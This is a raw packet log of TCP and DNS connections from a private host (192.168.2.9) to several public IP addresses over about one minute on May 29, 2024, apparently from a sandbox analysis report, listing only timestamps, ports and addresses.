May 29, 2024 15:06:24.313093901 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.313122988 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.313143015 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.313159943 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.313170910 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.313189983 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.313189983 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.313194990 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.313232899 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.333365917 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.333456039 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.334239006 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.334992886 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 29, 2024 15:06:24.342791080 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.342828035 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.362035990 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.362143993 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.362152100 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.362193108 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.362248898 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.362369061 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.362724066 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.362735987 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.384251118 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:24.384258986 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:24.384407997 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:24.384583950 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:24.384593010 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:24.419090033 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.419167042 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.419230938 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.419238091 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.419279099 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.420447111 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.420459032 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.441869020 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.441910982 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.442302942 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.442302942 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.442338943 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.780755997 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.781107903 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.781124115 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.782198906 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.782269955 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.783729076 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.790258884 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.790386915 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.790410995 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.790452957 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.790580988 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.790590048 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.792076111 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.792157888 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.792474031 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.792598963 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.792603970 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.796987057 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.797255039 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.797314882 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.798772097 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.798860073 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.800812960 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.800906897 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.800940990 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.827213049 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.827698946 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.827706099 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.829226971 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.829286098 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.830284119 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.833388090 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.833476067 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.833556890 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.833561897 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.840502977 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.845715046 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.845726013 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.845767021 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.845827103 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.880769968 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.889197111 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.889228106 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.889288902 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.889322042 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.889370918 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.891621113 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.891697884 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.891716003 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.891757011 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.891762018 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.891793013 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.891836882 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.900190115 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.900343895 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.918781996 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.918826103 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.919250965 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.919266939 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.920241117 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.920278072 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.937544107 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.937659025 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.937707901 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.947557926 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.947571039 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:25.040991068 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:25.041163921 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:25.041172028 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:25.042056084 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:25.042109966 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:25.042398930 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:25.042448997 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:25.042548895 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:25.042553902 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:25.095067978 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:25.144053936 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:25.144108057 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:25.144155979 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:25.146034002 CEST | 49731 | 443 | 192.168.2.9 | 13.107.246.67 |
May 29, 2024 15:06:25.146045923 CEST | 443 | 49731 | 13.107.246.67 | 192.168.2.9 |
May 29, 2024 15:06:25.331239939 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.331666946 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:25.331693888 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.332689047 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.332756042 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:25.333163977 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:25.333235979 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.333379984 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:25.333388090 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.381649017 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:25.524152994 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:25.524188042 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:25.524300098 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:25.524992943 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:25.525008917 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:25.537417889 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203 |
May 29, 2024 15:06:25.590071917 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.590112925 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.590178013 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.590186119 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:25.590245962 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:25.597165108 CEST | 49732 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:25.597191095 CEST | 443 | 49732 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:25.668688059 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:25.668839931 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:25.925539970 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:26.190677881 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:26.191483021 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:26.191494942 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:26.193427086 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:26.193511963 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:26.196258068 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:26.196346045 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:26.223905087 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:26.223943949 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:26.224085093 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:26.226207018 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:26.226227045 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:26.236030102 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:26.236047983 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:26.283514977 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:26.813292027 CEST | 49740 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:26.818255901 CEST | 53 | 49740 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:26.818325996 CEST | 49740 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:26.818404913 CEST | 49740 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:26.818406105 CEST | 49740 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:26.823544025 CEST | 53 | 49740 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:26.823599100 CEST | 53 | 49740 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:26.880214930 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:26.880278111 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:26.884037018 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:26.884052992 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:26.884324074 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:26.926724911 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:26.972491980 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:27.267249107 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:27.267337084 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:27.267395020 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:27.277986050 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:27.278000116 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:27.278012991 CEST | 49739 | 443 | 192.168.2.9 | 23.43.61.160 |
May 29, 2024 15:06:27.278018951 CEST | 443 | 49739 | 23.43.61.160 | 192.168.2.9 |
May 29, 2024 15:06:27.352755070 CEST | 53 | 49740 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:27.353840113 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:27.353868008 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:27.353929043 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:27.354809999 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:27.354824066 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:27.356355906 CEST | 49740 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:27.361579895 CEST | 53 | 49740 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:27.361655951 CEST | 49740 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:27.680038929 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
May 29, 2024 15:06:27.680502892 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:28.007740021 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:28.007836103 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:28.009711027 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:28.009723902 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:28.010238886 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:28.012067080 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:28.052509069 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:28.325370073 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:28.326011896 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:28.326061964 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:28.327864885 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:28.327887058 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:28.327899933 CEST | 49741 | 443 | 192.168.2.9 | 184.28.90.27 |
May 29, 2024 15:06:28.327905893 CEST | 443 | 49741 | 184.28.90.27 | 192.168.2.9 |
May 29, 2024 15:06:33.987617970 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 29, 2024 15:06:36.098704100 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:36.098777056 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:36.099031925 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:36.146428108 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:36.146471024 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:36.146539927 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:36.147805929 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:36.147825003 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:36.546827078 CEST | 49738 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:06:36.546854019 CEST | 443 | 49738 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:06:36.573589087 CEST | 443 | 49711 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:36.573671103 CEST | 443 | 49711 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:36.573879957 CEST | 49711 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:36.911550045 CEST | 49711 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:36.911580086 CEST | 443 | 49711 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:36.951754093 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:36.951862097 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:36.953583956 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:36.953598022 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:36.953937054 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:36.996504068 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.054351091 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.096523046 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325048923 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325119019 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325139999 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325175047 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.325181961 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325212955 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.325216055 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325233936 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.325234890 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325285912 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.325401068 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325460911 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.325468063 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325527906 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.325573921 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.339901924 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.339919090 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.339929104 CEST | 49750 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:06:37.339934111 CEST | 443 | 49750 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:06:37.483580112 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:37.488508940 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:37.488534927 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
May 29, 2024 15:06:37.488996983 CEST | 49754 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:37.489031076 CEST | 443 | 49754 | 23.206.229.209 | 192.168.2.9 |
May 29, 2024 15:06:37.489108086 CEST | 49754 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:37.489444971 CEST | 49754 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:37.489458084 CEST | 443 | 49754 | 23.206.229.209 | 192.168.2.9 |
May 29, 2024 15:06:37.493398905 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
May 29, 2024 15:06:38.086148977 CEST | 443 | 49754 | 23.206.229.209 | 192.168.2.9 |
May 29, 2024 15:06:38.086272955 CEST | 49754 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:06:52.048913002 CEST | 443 | 49712 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:52.048979998 CEST | 443 | 49712 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:52.049052000 CEST | 49712 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:53.444889069 CEST | 49712 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:53.444920063 CEST | 443 | 49712 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:57.253621101 CEST | 443 | 49754 | 23.206.229.209 | 192.168.2.9 |
May 29, 2024 15:06:57.253776073 CEST | 49754 | 443 | 192.168.2.9 | 23.206.229.209 |
May 29, 2024 15:07:13.996644020 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:13.996670961 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:13.996752024 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:13.997147083 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:13.997153997 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:14.812382936 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:14.812469006 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:14.814070940 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:14.814091921 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:14.814486980 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:14.816940069 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:14.864506960 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.149585009 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.149621010 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.149677038 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:15.149693012 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.149883986 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:15.150120974 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.150178909 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
